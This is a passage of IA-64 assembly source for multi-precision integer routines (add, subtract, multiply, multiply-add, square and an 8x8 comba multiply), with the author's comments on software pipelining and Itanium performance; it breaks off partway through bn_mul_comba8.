// BN_ULONG bn_add_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
//
// r[] = a[] + b[]; returns the final carry (0 or 1) in r8.
// Modulo-scheduled counted loop (br.ctop) with ar.ec=6 pipeline
// stages: rotating registers stage load / add / carry-detect /
// carry-ripple / store; rotating predicates p16.. gate each stage.
//
.global bn_add_words#
.proc bn_add_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_add_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
cmp4.le p6,p0=r35,r0 };;
{ .mfb; mov r8=r0 // return value
(p6) br.ret.spnt.many b0 };; // num<=0: return 0
{ .mib; sub r10=r35,r0,1 // loop count = num-1
.save ar.lc,r3
mov r3=ar.lc
brp.loop.imp .L_bn_add_words_ctop,.L_bn_add_words_cend-16
}
{ .mib; ADDP r14=0,r32 // rp
.save pr,r9
mov r9=pr };;
.body
{ .mii; ADDP r15=0,r33 // ap
mov ar.lc=r10
mov ar.ec=6 }
{ .mib; ADDP r16=0,r34 // bp
mov pr.rot=1<<16 };; // start the pipeline: only p16 set
.L_bn_add_words_ctop:
{ .mii; (p16) ld8 r32=[r16],8 // b=*(bp++)
(p18) add r39=r37,r34
(p19) cmp.ltu.unc p56,p0=r40,r38 } // carry out of the add?
{ .mfb; (p0) nop.m 0x0
(p0) nop.f 0x0
(p0) nop.b 0x0 }
{ .mii; (p16) ld8 r35=[r15],8 // a=*(ap++)
(p58) cmp.eq.or p57,p0=-1,r41 // (p20)
(p58) add r41=1,r41 } // (p20) ripple the carry
{ .mfb; (p21) st8 [r14]=r42,8 // *(rp++)=r
(p0) nop.f 0x0
br.ctop.sptk .L_bn_add_words_ctop };;
.L_bn_add_words_cend:
{ .mii;
(p59) add r8=1,r8 // return value
mov pr=r9,0x1ffff // restore predicates
mov ar.lc=r3 }
{ .mbb; nop.b 0x0
br.ret.sptk.many b0 };;
.endp bn_add_words#
//
// BN_ULONG bn_sub_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
//
// r[] = a[] - b[]; returns the final borrow (0 or 1) in r8.
// Same 6-stage modulo-scheduled structure as bn_add_words above,
// with sub and the borrow conditions in place of add/carry.
//
.global bn_sub_words#
.proc bn_sub_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_sub_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
cmp4.le p6,p0=r35,r0 };;
{ .mfb; mov r8=r0 // return value
(p6) br.ret.spnt.many b0 };; // num<=0: return 0
{ .mib; sub r10=r35,r0,1 // loop count = num-1
.save ar.lc,r3
mov r3=ar.lc
brp.loop.imp .L_bn_sub_words_ctop,.L_bn_sub_words_cend-16
}
{ .mib; ADDP r14=0,r32 // rp
.save pr,r9
mov r9=pr };;
.body
{ .mii; ADDP r15=0,r33 // ap
mov ar.lc=r10
mov ar.ec=6 }
{ .mib; ADDP r16=0,r34 // bp
mov pr.rot=1<<16 };; // start the pipeline: only p16 set
.L_bn_sub_words_ctop:
{ .mii; (p16) ld8 r32=[r16],8 // b=*(bp++)
(p18) sub r39=r37,r34
(p19) cmp.gtu.unc p56,p0=r40,r38 } // borrow out of the sub?
{ .mfb; (p0) nop.m 0x0
(p0) nop.f 0x0
(p0) nop.b 0x0 }
{ .mii; (p16) ld8 r35=[r15],8 // a=*(ap++)
(p58) cmp.eq.or p57,p0=0,r41 // (p20)
(p58) add r41=-1,r41 } // (p20) ripple the borrow
{ .mbb; (p21) st8 [r14]=r42,8 // *(rp++)=r
(p0) nop.b 0x0
br.ctop.sptk .L_bn_sub_words_ctop };;
.L_bn_sub_words_cend:
{ .mii;
(p59) add r8=1,r8 // return value
mov pr=r9,0x1ffff // restore predicates
mov ar.lc=r3 }
{ .mbb; nop.b 0x0
br.ret.sptk.many b0 };;
.endp bn_sub_words#
#endif
#if 0
#define XMA_TEMPTATION
#endif
#if 1
//
// BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
//
// rp[i] = low64(ap[i]*w) with carry propagation; returns the final
// carry word in r8.  The production loop keeps the 64x64 multiply
// in the FPU (xmpy.lu/xmpy.hu on f8=w) and does the carry addition
// in the integer ALU (ar.ec=13 pipeline stages); the commented-out
// XMA_TEMPTATION variant shows the shorter-but-slower pure-xma loop.
//
.global bn_mul_words#
.proc bn_mul_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_mul_words:
.prologue
.save ar.pfs,r2
#ifdef XMA_TEMPTATION
{ .mfi; alloc r2=ar.pfs,4,0,0,0 };;
#else
{ .mfi; alloc r2=ar.pfs,4,12,0,16 };;
#endif
{ .mib; mov r8=r0 // return value
cmp4.le p6,p0=r34,r0
(p6) br.ret.spnt.many b0 };; // num<=0: return 0
{ .mii; sub r10=r34,r0,1 // loop count = num-1
.save ar.lc,r3
mov r3=ar.lc
.save pr,r9
mov r9=pr };;
.body
{ .mib; setf.sig f8=r35 // w
mov pr.rot=0x800001<<16
// ------^----- serves as (p50) at first (p27)
brp.loop.imp .L_bn_mul_words_ctop,.L_bn_mul_words_cend-16
}
#ifndef XMA_TEMPTATION
{ .mmi; ADDP r14=0,r32 // rp
ADDP r15=0,r33 // ap
mov ar.lc=r10 }
{ .mmi; mov r40=0 // serves as r35 at first (p27)
mov ar.ec=13 };;
// This loop spins in 2*(n+12) ticks. It's scheduled for data in Itanium
// L2 cache (i.e. 9 ticks away) as floating point load/store instructions
// bypass L1 cache and L2 latency is actually best-case scenario for
// ldf8. The loop is not scalable and shall run in 2*(n+12) even on
// "wider" IA-64 implementations. It's a trade-off here. n+24 loop
// would give us ~5% in *overall* performance improvement on "wider"
// IA-64, but would hurt Itanium for about same because of longer
// epilogue. As it's a matter of few percents in either case I've
// chosen to trade the scalability for development time (you can see
// this very instruction sequence in bn_mul_add_words loop which in
// turn is scalable).
.L_bn_mul_words_ctop:
{ .mfi; (p25) getf.sig r36=f52 // low
(p21) xmpy.lu f48=f37,f8
(p28) cmp.ltu p54,p50=r41,r39 } // carry out of the low add?
{ .mfi; (p16) ldf8 f32=[r15],8
(p21) xmpy.hu f40=f37,f8
(p0) nop.i 0x0 };;
{ .mii; (p25) getf.sig r32=f44 // high
.pred.rel "mutex",p50,p54
(p50) add r40=r38,r35 // (p27) no pending carry
(p54) add r40=r38,r35,1 } // (p27) add pending carry
{ .mfb; (p28) st8 [r14]=r41,8
(p0) nop.f 0x0
br.ctop.sptk .L_bn_mul_words_ctop };;
.L_bn_mul_words_cend:
{ .mii; nop.m 0x0
.pred.rel "mutex",p51,p55
(p51) add r8=r36,r0
(p55) add r8=r36,r0,1 }
{ .mfb; nop.m 0x0
nop.f 0x0
nop.b 0x0 }
#else // XMA_TEMPTATION
setf.sig f37=r0 // serves as carry at (p18) tick
mov ar.lc=r10
mov ar.ec=5;;
// Most of you examining this code very likely wonder why in the name
// of Intel the following loop is commented out? Indeed, it looks so
// neat that you find it hard to believe that it's something wrong
// with it, right? The catch is that every iteration depends on the
// result from previous one and the latter isn't available instantly.
// The loop therefore spins at the latency of xma minus 1, or in other
// words at 6*(n+4) ticks:-( Compare to the "production" loop above
// that runs in 2*(n+11) where the low latency problem is worked around
// by moving the dependency to one-tick latent interger ALU. Note that
// "distance" between ldf8 and xma is not latency of ldf8, but the
// *difference* between xma and ldf8 latencies.
.L_bn_mul_words_ctop:
{ .mfi; (p16) ldf8 f32=[r33],8
(p18) xma.hu f38=f34,f8,f39 }
{ .mfb; (p20) stf8 [r32]=f37,8
(p18) xma.lu f35=f34,f8,f39
br.ctop.sptk .L_bn_mul_words_ctop };;
.L_bn_mul_words_cend:
getf.sig r8=f41 // the return value
#endif // XMA_TEMPTATION
{ .mii; nop.m 0x0
mov pr=r9,0x1ffff // restore predicates
mov ar.lc=r3 }
{ .mfb; rum 1<<5 // clear um.mfh
nop.f 0x0
br.ret.sptk.many b0 };;
.endp bn_mul_words#
#endif
#if 1
//
// BN_ULONG bn_mul_add_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
//
// rp[i] += low64(ap[i]*w) with carry propagation; returns the final
// carry word in r8.  rp is read through a second pointer (r16) so the
// load of rp[i] can be folded into the xma in the FPU while the store
// goes through r14; ar.ec=11 pipeline stages.
//
.global bn_mul_add_words#
.proc bn_mul_add_words#
.align 64
.skip 48 // makes the loop body aligned at 64-byte boundary
bn_mul_add_words:
.prologue
.save ar.pfs,r2
{ .mmi; alloc r2=ar.pfs,4,4,0,8
cmp4.le p6,p0=r34,r0
.save ar.lc,r3
mov r3=ar.lc };;
{ .mib; mov r8=r0 // return value
sub r10=r34,r0,1 // loop count = num-1
(p6) br.ret.spnt.many b0 };; // num<=0: return 0
{ .mib; setf.sig f8=r35 // w
.save pr,r9
mov r9=pr
brp.loop.imp .L_bn_mul_add_words_ctop,.L_bn_mul_add_words_cend-16
}
.body
{ .mmi; ADDP r14=0,r32 // rp
ADDP r15=0,r33 // ap
mov ar.lc=r10 }
{ .mii; ADDP r16=0,r32 // rp copy
mov pr.rot=0x2001<<16
// ------^----- serves as (p40) at first (p27)
mov ar.ec=11 };;
// This loop spins in 3*(n+10) ticks on Itanium and in 2*(n+10) on
// Itanium 2. Yes, unlike previous versions it scales:-) Previous
// version was peforming *all* additions in IALU and was starving
// for those even on Itanium 2. In this version one addition is
// moved to FPU and is folded with multiplication. This is at cost
// of propogating the result from previous call to this subroutine
// to L2 cache... In other words negligible even for shorter keys.
// *Overall* performance improvement [over previous version] varies
// from 11 to 22 percent depending on key length.
.L_bn_mul_add_words_ctop:
.pred.rel "mutex",p40,p42
{ .mfi; (p23) getf.sig r36=f45 // low
(p20) xma.lu f42=f36,f8,f50 // low
(p40) add r39=r39,r35 } // (p27) no pending carry
{ .mfi; (p16) ldf8 f32=[r15],8 // *(ap++)
(p20) xma.hu f36=f36,f8,f50 // high
(p42) add r39=r39,r35,1 };; // (p27) add pending carry
{ .mmi; (p24) getf.sig r32=f40 // high
(p16) ldf8 f46=[r16],8 // *(rp1++)
(p40) cmp.ltu p41,p39=r39,r35 } // (p27) carry out?
{ .mib; (p26) st8 [r14]=r39,8 // *(rp2++)
(p42) cmp.leu p41,p39=r39,r35 // (p27) carry out (w/ pending)?
br.ctop.sptk .L_bn_mul_add_words_ctop};;
.L_bn_mul_add_words_cend:
{ .mmi; .pred.rel "mutex",p40,p42
(p40) add r8=r35,r0
(p42) add r8=r35,r0,1
mov pr=r9,0x1ffff } // restore predicates
{ .mib; rum 1<<5 // clear um.mfh
mov ar.lc=r3
br.ret.sptk.many b0 };;
.endp bn_mul_add_words#
#endif
#if 1
//
// void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
//
// Stores the 128-bit square of each input word: for i in [0,num),
// rp[2*i] = lo64(ap[i]^2), rp[2*i+1] = hi64(ap[i]^2). Fully pipelined:
// xmpy.lu/xmpy.hu produce both halves, stored through two pointers
// (r32 low half, r34 high half) advancing 16 bytes per iteration.
//
.global bn_sqr_words#
.proc bn_sqr_words#
.align 64
.skip 32 // makes the loop body aligned at 64-byte boundary
bn_sqr_words:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,3,0,0,0
sxt4 r34=r34 };; // sign-extend num from 32 bits
{ .mii; cmp.le p6,p0=r34,r0 // num <= 0?
mov r8=r0 } // return value
{ .mfb; ADDP r32=0,r32
nop.f 0x0
(p6) br.ret.spnt.many b0 };; // early return if nothing to do
{ .mii; sub r10=r34,r0,1 // loop count = num-1
.save ar.lc,r3
mov r3=ar.lc
.save pr,r9
mov r9=pr };;
.body
{ .mib; ADDP r33=0,r33
mov pr.rot=1<<16
brp.loop.imp .L_bn_sqr_words_ctop,.L_bn_sqr_words_cend-16
}
{ .mii; add r34=8,r32 // second store pointer (high halves)
mov ar.lc=r10
mov ar.ec=18 };; // long epilogue: xmpy latency dominates
// 2*(n+17) on Itanium, (n+17) on "wider" IA-64 implementations. It's
// possible to compress the epilogue (I'm getting tired to write this
// comment over and over) and get down to 2*n+16 at the cost of
// scalability. The decision will very likely be reconsidered after the
// benchmark program is profiled. I.e. if performance gain on Itanium
// will appear larger than loss on "wider" IA-64, then the loop should
// be explicitly split and the epilogue compressed.
.L_bn_sqr_words_ctop:
{ .mfi; (p16) ldf8 f32=[r33],8 // load ap[i]
(p25) xmpy.lu f42=f41,f41 // low 64 bits of square
(p0) nop.i 0x0 }
{ .mib; (p33) stf8 [r32]=f50,16 // store low half
(p0) nop.i 0x0
(p0) nop.b 0x0 }
{ .mfi; (p0) nop.m 0x0
(p25) xmpy.hu f52=f41,f41 // high 64 bits of square
(p0) nop.i 0x0 }
{ .mib; (p33) stf8 [r34]=f60,16 // store high half
(p0) nop.i 0x0
br.ctop.sptk .L_bn_sqr_words_ctop };;
.L_bn_sqr_words_cend:
{ .mii; nop.m 0x0
mov pr=r9,0x1ffff // restore caller's predicates
mov ar.lc=r3 } // restore loop counter
{ .mfb; rum 1<<5 // clear um.mfh
nop.f 0x0
br.ret.sptk.many b0 };;
.endp bn_sqr_words#
#endif
#if 1
// Apparently we win nothing by implementing special bn_sqr_comba8.
// Yes, it is possible to reduce the number of multiplications by
// almost factor of two, but then the amount of additions would
// increase by factor of two (as we would have to perform those
// otherwise performed by xma ourselves). Normally we would trade
// anyway as multiplications are way more expensive, but not this
// time... Multiplication kernel is fully pipelined and as we drain
// one 128-bit multiplication result per clock cycle multiplications
// are effectively as inexpensive as additions. Special implementation
// might become of interest for "wider" IA-64 implementation as you'll
// be able to get through the multiplication phase faster (there won't
// be any stall issues as discussed in the commentary section below and
// you therefore will be able to employ all 4 FP units)... But these
// Itanium days it's simply too hard to justify the effort so I just
// drop down to bn_mul_comba8 code:-)
//
// void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
//
// Implemented by duplicating the 'a' pointer into the 'b' slots and
// tail-branching into bn_mul_comba8's cheat entry point, i.e.
// bn_sqr_comba8(r,a) == bn_mul_comba8(r,a,a).
.global bn_sqr_comba8#
.proc bn_sqr_comba8#
.align 64
bn_sqr_comba8:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,2,1,0,0
addp4 r33=0,r33 // HP-UX ILP32: widen 32-bit pointers
addp4 r32=0,r32 };;
{ .mii;
#else
{ .mii; alloc r2=ar.pfs,2,1,0,0
#endif
mov r34=r33 // b = a
add r14=8,r33 };; // a+8
.body
{ .mii; add r17=8,r34 // b+8
add r15=16,r33 // a+16
add r18=16,r34 } // b+16
{ .mfb; add r16=24,r33 // a+24 (r19=b+24 set at entry point)
br .L_cheat_entry_point8 };; // fall into bn_mul_comba8
.endp bn_sqr_comba8#
#endif
#if 1
// I've estimated this routine to run in ~120 ticks, but in reality
// (i.e. according to ar.itc) it takes ~160 ticks. Are those extra
// cycles consumed for instructions fetch? Or did I misinterpret some
// clause in Itanium architecture manual? Comments are welcomed and
// highly appreciated.
//
// On Itanium 2 it takes ~190 ticks. This is because of stalls on
// result from getf.sig. I do nothing about it at this point for
// reasons depicted below.
//
// However! It should be noted that even 160 ticks is darn good result
// as it's over 10 (yes, ten, spelled as t-e-n) times faster than the
// C version (compiled with gcc with inline assembler). I really
// kicked compiler's butt here, didn't I? Yeah! This brings us to the
// following statement. It's damn shame that this routine isn't called
// very often nowadays! According to the profiler most CPU time is
// consumed by bn_mul_add_words called from BN_from_montgomery. In
// order to estimate what we're missing, I've compared the performance
// of this routine against "traditional" implementation, i.e. against
// following routine:
//
// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
// { r[ 8]=bn_mul_words( &(r[0]),a,8,b[0]);
// r[ 9]=bn_mul_add_words(&(r[1]),a,8,b[1]);
// r[10]=bn_mul_add_words(&(r[2]),a,8,b[2]);
// r[11]=bn_mul_add_words(&(r[3]),a,8,b[3]);
// r[12]=bn_mul_add_words(&(r[4]),a,8,b[4]);
// r[13]=bn_mul_add_words(&(r[5]),a,8,b[5]);
// r[14]=bn_mul_add_words(&(r[6]),a,8,b[6]);
// r[15]=bn_mul_add_words(&(r[7]),a,8,b[7]);
// }
//
// The one below is over 8 times faster than the one above:-( Even
// more reasons to "combafy" bn_mul_add_mont...
//
// And yes, this routine really made me wish there were an optimizing
// assembler! It also feels like it deserves a dedication.
//
// To my wife for being there and to my kids...
//
// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
//
// Column-wise (comba) 8x8-word multiply: r[0..15] = a[0..7] * b[0..7].
// Structure: all 64 partial products are launched through a fully
// pipelined sequence of xma.hu/xma.lu pairs (multiplier "heaven"),
// then the 128-bit columns are summed in the integer ALU with the
// carries tracked in carry1/carry2/carry3 below.
#define carry1 r14
#define carry2 r15
#define carry3 r34
.global bn_mul_comba8#
.proc bn_mul_comba8#
.align 64
bn_mul_comba8:
.prologue
.save ar.pfs,r2
#if defined(_HPUX_SOURCE) && !defined(_LP64)
{ .mii; alloc r2=ar.pfs,3,0,0,0
addp4 r33=0,r33 // HP-UX ILP32: widen 32-bit pointers
addp4 r34=0,r34 };;
{ .mii; addp4 r32=0,r32
#else
{ .mii; alloc r2=ar.pfs,3,0,0,0
#endif
add r14=8,r33 // a+8
add r17=8,r34 } // b+8
.body
{ .mii; add r15=16,r33 // a+16
add r18=16,r34 // b+16
add r16=24,r33 } // a+24
.L_cheat_entry_point8: // entered from bn_sqr_comba8 with b:=a
{ .mmi; add r19=24,r34 // b+24
ldf8 f32=[r33],32 };; // a[0]
{ .mmi; ldf8 f120=[r34],32 // b[0]
ldf8 f121=[r17],32 } // b[1]
{ .mmi; ldf8 f122=[r18],32 // b[2]
ldf8 f123=[r19],32 };; // b[3]
{ .mmi; ldf8 f124=[r34] // b[4]
ldf8 f125=[r17] } // b[5]
{ .mmi; ldf8 f126=[r18] // b[6]
ldf8 f127=[r19] } // b[7]
{ .mmi; ldf8 f33=[r14],32 // a[1]
ldf8 f34=[r15],32 } // a[2]
{ .mmi; ldf8 f35=[r16],32;; // a[3]
ldf8 f36=[r33] } // a[4]
{ .mmi; ldf8 f37=[r14] // a[5]
ldf8 f38=[r15] } // a[6]
{ .mfi; ldf8 f39=[r16] // a[7]
// -------\ Entering multiplier's heaven /-------
// ------------\ /------------
// -----------------\ /-----------------
// ----------------------\/----------------------
xma.hu f41=f32,f120,f0 } // a[0]*b[0..7], hi/lo pairs
{ .mfi; xma.lu f40=f32,f120,f0 };; // (*)
{ .mfi; xma.hu f51=f32,f121,f0 }
{ .mfi; xma.lu f50=f32,f121,f0 };;
{ .mfi; xma.hu f61=f32,f122,f0 }
{ .mfi; xma.lu f60=f32,f122,f0 };;
{ .mfi; xma.hu f71=f32,f123,f0 }
{ .mfi; xma.lu f70=f32,f123,f0 };;
{ .mfi; xma.hu f81=f32,f124,f0 }
{ .mfi; xma.lu f80=f32,f124,f0 };;
{ .mfi; xma.hu f91=f32,f125,f0 }
{ .mfi; xma.lu f90=f32,f125,f0 };;
{ .mfi; xma.hu f101=f32,f126,f0 }
{ .mfi; xma.lu f100=f32,f126,f0 };;
{ .mfi; xma.hu f111=f32,f127,f0 }
{ .mfi; xma.lu f110=f32,f127,f0 };;//
// (*) You can argue that splitting at every second bundle would
// prevent "wider" IA-64 implementations from achieving the peak
// performance. Well, not really... The catch is that if you
// intend to keep 4 FP units busy by splitting at every fourth
// bundle and thus perform these 16 multiplications in 4 ticks,
// the first bundle *below* would stall because the result from
// the first xma bundle *above* won't be available for another 3
// ticks (if not more, being an optimist, I assume that "wider"
// implementation will have same latency:-). This stall will hold
// you back and the performance would be as if every second bundle
// were split *anyway*...
{ .mfi; getf.sig r16=f40 // r[0]
xma.hu f42=f33,f120,f41 // a[1]*b[0..7] folded with prior highs
add r33=8,r32 }
{ .mfi; xma.lu f41=f33,f120,f41 };;
{ .mfi; getf.sig r24=f50
xma.hu f52=f33,f121,f51 }
{ .mfi; xma.lu f51=f33,f121,f51 };;
{ .mfi; st8 [r32]=r16,16 // store r[0]
xma.hu f62=f33,f122,f61 }
{ .mfi; xma.lu f61=f33,f122,f61 };;
{ .mfi; xma.hu f72=f33,f123,f71 }
{ .mfi; xma.lu f71=f33,f123,f71 };;
{ .mfi; xma.hu f82=f33,f124,f81 }
{ .mfi; xma.lu f81=f33,f124,f81 };;
{ .mfi; xma.hu f92=f33,f125,f91 }
{ .mfi; xma.lu f91=f33,f125,f91 };;
{ .mfi; xma.hu f102=f33,f126,f101 }
{ .mfi; xma.lu f101=f33,f126,f101 };;
{ .mfi; xma.hu f112=f33,f127,f111 }
{ .mfi; xma.lu f111=f33,f127,f111 };;//
//-------------------------------------------------//
// Column 1: sum partials for r[1] while launching a[2]*b[0..7].
{ .mfi; getf.sig r25=f41
xma.hu f43=f34,f120,f42 }
{ .mfi; xma.lu f42=f34,f120,f42 };;
{ .mfi; getf.sig r16=f60
xma.hu f53=f34,f121,f52 }
{ .mfi; xma.lu f52=f34,f121,f52 };;
{ .mfi; getf.sig r17=f51
xma.hu f63=f34,f122,f62
add r25=r25,r24 }
{ .mfi; xma.lu f62=f34,f122,f62
mov carry1=0 };;
{ .mfi; cmp.ltu p6,p0=r25,r24
xma.hu f73=f34,f123,f72 }
{ .mfi; xma.lu f72=f34,f123,f72 };;
{ .mfi; st8 [r33]=r25,16 // store r[1]
xma.hu f83=f34,f124,f82
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f82=f34,f124,f82 };;
{ .mfi; xma.hu f93=f34,f125,f92 }
{ .mfi; xma.lu f92=f34,f125,f92 };;
{ .mfi; xma.hu f103=f34,f126,f102 }
{ .mfi; xma.lu f102=f34,f126,f102 };;
{ .mfi; xma.hu f113=f34,f127,f112 }
{ .mfi; xma.lu f112=f34,f127,f112 };;//
//-------------------------------------------------//
// Column 2: sum partials for r[2] while launching a[3]*b[0..7].
{ .mfi; getf.sig r18=f42
xma.hu f44=f35,f120,f43
add r17=r17,r16 }
{ .mfi; xma.lu f43=f35,f120,f43 };;
{ .mfi; getf.sig r24=f70
xma.hu f54=f35,f121,f53 }
{ .mfi; mov carry2=0
xma.lu f53=f35,f121,f53 };;
{ .mfi; getf.sig r25=f61
xma.hu f64=f35,f122,f63
cmp.ltu p7,p0=r17,r16 }
{ .mfi; add r18=r18,r17
xma.lu f63=f35,f122,f63 };;
{ .mfi; getf.sig r26=f52
xma.hu f74=f35,f123,f73
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f73=f35,f123,f73
add r18=r18,carry1 };;
{ .mfi;
xma.hu f84=f35,f124,f83
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,carry1
xma.lu f83=f35,f124,f83 };;
{ .mfi; st8 [r32]=r18,16 // store r[2]
xma.hu f94=f35,f125,f93
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f93=f35,f125,f93 };;
{ .mfi; xma.hu f104=f35,f126,f103 }
{ .mfi; xma.lu f103=f35,f126,f103 };;
{ .mfi; xma.hu f114=f35,f127,f113 }
{ .mfi; mov carry1=0
xma.lu f113=f35,f127,f113
add r25=r25,r24 };;//
//-------------------------------------------------//
// Column 3: sum partials for r[3] while launching a[4]*b[0..7].
{ .mfi; getf.sig r27=f43
xma.hu f45=f36,f120,f44
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f44=f36,f120,f44
add r26=r26,r25 };;
{ .mfi; getf.sig r16=f80
xma.hu f55=f36,f121,f54
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f54=f36,f121,f54 };;
{ .mfi; getf.sig r17=f71
xma.hu f65=f36,f122,f64
cmp.ltu p6,p0=r26,r25 }
{ .mfi; xma.lu f64=f36,f122,f64
add r27=r27,r26 };;
{ .mfi; getf.sig r18=f62
xma.hu f75=f36,f123,f74
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r27,r26
xma.lu f74=f36,f123,f74
add r27=r27,carry2 };;
{ .mfi; getf.sig r19=f53
xma.hu f85=f36,f124,f84
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f84=f36,f124,f84
cmp.ltu p6,p0=r27,carry2 };;
{ .mfi; st8 [r33]=r27,16 // store r[3]
xma.hu f95=f36,f125,f94
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f94=f36,f125,f94 };;
{ .mfi; xma.hu f105=f36,f126,f104 }
{ .mfi; mov carry2=0
xma.lu f104=f36,f126,f104
add r17=r17,r16 };;
{ .mfi; xma.hu f115=f36,f127,f114
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f114=f36,f127,f114
add r18=r18,r17 };;//
//-------------------------------------------------//
// Column 4: sum partials for r[4] while launching a[5]*b[0..7].
{ .mfi; getf.sig r20=f44
xma.hu f46=f37,f120,f45
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f45=f37,f120,f45
add r19=r19,r18 };;
{ .mfi; getf.sig r24=f90
xma.hu f56=f37,f121,f55 }
{ .mfi; xma.lu f55=f37,f121,f55 };;
{ .mfi; getf.sig r25=f81
xma.hu f66=f37,f122,f65
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r19,r18
xma.lu f65=f37,f122,f65
add r20=r20,r19 };;
{ .mfi; getf.sig r26=f72
xma.hu f76=f37,f123,f75
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r20,r19
xma.lu f75=f37,f123,f75
add r20=r20,carry1 };;
{ .mfi; getf.sig r27=f63
xma.hu f86=f37,f124,f85
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f85=f37,f124,f85
cmp.ltu p7,p0=r20,carry1 };;
{ .mfi; getf.sig r28=f54
xma.hu f96=f37,f125,f95
(p7) add carry2=1,carry2 }
{ .mfi; st8 [r32]=r20,16 // store r[4]
xma.lu f95=f37,f125,f95 };;
{ .mfi; xma.hu f106=f37,f126,f105 }
{ .mfi; mov carry1=0
xma.lu f105=f37,f126,f105
add r25=r25,r24 };;
{ .mfi; xma.hu f116=f37,f127,f115
cmp.ltu p6,p0=r25,r24 }
{ .mfi; xma.lu f115=f37,f127,f115
add r26=r26,r25 };;//
//-------------------------------------------------//
// Column 5: sum partials for r[5] while launching a[6]*b[0..7].
{ .mfi; getf.sig r29=f45
xma.hu f47=f38,f120,f46
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r26,r25
xma.lu f46=f38,f120,f46
add r27=r27,r26 };;
{ .mfi; getf.sig r16=f100
xma.hu f57=f38,f121,f56
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r27,r26
xma.lu f56=f38,f121,f56
add r28=r28,r27 };;
{ .mfi; getf.sig r17=f91
xma.hu f67=f38,f122,f66
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r28,r27
xma.lu f66=f38,f122,f66
add r29=r29,r28 };;
{ .mfi; getf.sig r18=f82
xma.hu f77=f38,f123,f76
(p6) add carry1=1,carry1 }
{ .mfi; cmp.ltu p6,p0=r29,r28
xma.lu f76=f38,f123,f76
add r29=r29,carry2 };;
{ .mfi; getf.sig r19=f73
xma.hu f87=f38,f124,f86
(p6) add carry1=1,carry1 }
{ .mfi; xma.lu f86=f38,f124,f86
cmp.ltu p6,p0=r29,carry2 };;
{ .mfi; getf.sig r20=f64
xma.hu f97=f38,f125,f96
(p6) add carry1=1,carry1 }
{ .mfi; st8 [r33]=r29,16 // store r[5]
xma.lu f96=f38,f125,f96 };;
{ .mfi; getf.sig r21=f55
xma.hu f107=f38,f126,f106 }
{ .mfi; mov carry2=0
xma.lu f106=f38,f126,f106
add r17=r17,r16 };;
{ .mfi; xma.hu f117=f38,f127,f116
cmp.ltu p7,p0=r17,r16 }
{ .mfi; xma.lu f116=f38,f127,f116
add r18=r18,r17 };;//
//-------------------------------------------------//
// Column 6: sum partials for r[6] while launching a[7]*b[0..7]
// (the last multiplier row).
{ .mfi; getf.sig r22=f46
xma.hu f48=f39,f120,f47
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r18,r17
xma.lu f47=f39,f120,f47
add r19=r19,r18 };;
{ .mfi; getf.sig r24=f110
xma.hu f58=f39,f121,f57
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r19,r18
xma.lu f57=f39,f121,f57
add r20=r20,r19 };;
{ .mfi; getf.sig r25=f101
xma.hu f68=f39,f122,f67
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r20,r19
xma.lu f67=f39,f122,f67
add r21=r21,r20 };;
{ .mfi; getf.sig r26=f92
xma.hu f78=f39,f123,f77
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r21,r20
xma.lu f77=f39,f123,f77
add r22=r22,r21 };;
{ .mfi; getf.sig r27=f83
xma.hu f88=f39,f124,f87
(p7) add carry2=1,carry2 }
{ .mfi; cmp.ltu p7,p0=r22,r21
xma.lu f87=f39,f124,f87
add r22=r22,carry1 };;
{ .mfi; getf.sig r28=f74
xma.hu f98=f39,f125,f97
(p7) add carry2=1,carry2 }
{ .mfi; xma.lu f97=f39,f125,f97
cmp.ltu p7,p0=r22,carry1 };;
{ .mfi; getf.sig r29=f65
xma.hu f108=f39,f126,f107
(p7) add carry2=1,carry2 }
{ .mfi; st8 [r32]=r22,16 // store r[6]
xma.lu f107=f39,f126,f107 };;
{ .mfi; getf.sig r30=f56
xma.hu f118=f39,f127,f117 }
{ .mfi; xma.lu f117=f39,f127,f117 };;//
//-------------------------------------------------//
// Leaving multiplier's heaven... Quite a ride, huh?
// Pure integer phase from here on: drain the remaining column sums
